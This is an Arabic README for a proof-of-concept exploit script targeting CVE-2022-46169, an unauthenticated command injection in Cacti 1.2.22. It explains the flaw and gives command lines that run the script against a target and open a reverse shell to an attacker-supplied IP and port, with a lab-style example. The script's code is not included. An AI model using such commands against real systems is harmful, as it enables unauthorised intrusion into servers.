
PoC لـ CVE-2022-46169 الذي يؤثر على إصدار Cacti 1.2.22
هذا نص برهان المفهوم (POC) للثغرة الأمنية CVE-2022-46169 التي تؤثر على Cacti الإصدار 1.2.22.
تسمح الثغرة الأمنية CVE-2022-46169 بحقن أوامر غير مصادق عليه في إصدارات Cacti حتى 1.2.22، وذلك لتحقيق تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه كمستخدم www-data. تنتج الثغرة عن التحقق غير السليم من إدخال المستخدم في معامل "host_id" في ملف "remote_agent.php".
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>
استبدل <TARGET_URL> بعنوان URL لتثبيت Cacti المستهدف، و<YOUR_IP> بعنوان IP الخاص بالجهاز الذي تريد استقبال الصدفة العكسية عليه، و<YOUR_PORT> برقم المنفذ الذي تريد استقبال الصدفة العكسية عليه.
مثال:
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337
هذا النص البرمجي لبرهان المفهوم هو للأغراض التعليمية فقط. استخدمه على مسؤوليتك الخاصة. مؤلف هذا النص البرمجي غير مسؤول عن أي ضرر ناتج عن استخدامه. المراجع
CVE-2022-46169 - مدخل CVE للثغرة الأمنية.
نصائح أمان Cacti على Github